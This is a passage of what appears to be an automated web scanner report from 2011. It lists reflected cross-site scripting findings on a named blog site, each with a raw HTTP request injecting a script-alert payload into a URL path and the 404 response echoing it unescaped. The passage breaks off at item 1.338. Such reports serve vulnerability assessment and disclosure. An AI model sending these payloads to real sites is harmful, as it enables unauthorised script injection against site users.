Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/indiana/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f8819<script>alert(1)</script>89fc3a9ebb4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesf8819<script>alert(1)</script>89fc3a9ebb4/indiana/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:54 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesf8819<script>alert(1)</script>89fc3a9ebb4/indiana/ was not found on this server.</p>
...[SNIP]...

1.333. http://blog.pandora.com/pandora/archives/indiana/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/indiana/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6554d<script>alert(1)</script>6f5884afdfb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/indiana6554d<script>alert(1)</script>6f5884afdfb/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:56 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/indiana6554d<script>alert(1)</script>6f5884afdfb/ was not found on this server.</p>
...[SNIP]...

1.334. http://blog.pandora.com/pandora/archives/louisiana/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/louisiana/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload bd390<script>alert(1)</script>573c7e0b3bc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandorabd390<script>alert(1)</script>573c7e0b3bc/archives/louisiana/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:57 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 351


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandorabd390<script>alert(1)</script>573c7e0b3bc/archives/louisiana/ was not found on this server.</p>
...[SNIP]...

1.335. http://blog.pandora.com/pandora/archives/louisiana/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/louisiana/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d4792<script>alert(1)</script>859bb1e33f2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesd4792<script>alert(1)</script>859bb1e33f2/louisiana/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:59 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 351


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesd4792<script>alert(1)</script>859bb1e33f2/louisiana/ was not found on this server.</p>
...[SNIP]...

1.336. http://blog.pandora.com/pandora/archives/louisiana/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/louisiana/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4595a<script>alert(1)</script>14a7a2da08 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/louisiana4595a<script>alert(1)</script>14a7a2da08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:01 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 350


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/louisiana4595a<script>alert(1)</script>14a7a2da08/ was not found on this server.</p>
...[SNIP]...

1.337. http://blog.pandora.com/pandora/archives/maine/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/maine/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4aa7e<script>alert(1)</script>1648ab9c938 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora4aa7e<script>alert(1)</script>1648ab9c938/archives/maine/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:54 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 347


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora4aa7e<script>alert(1)</script>1648ab9c938/archives/maine/ was not found on this server.</p>
...[SNIP]...

1.338. http://blog.pandora.com/pandora/archives/maine/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/maine/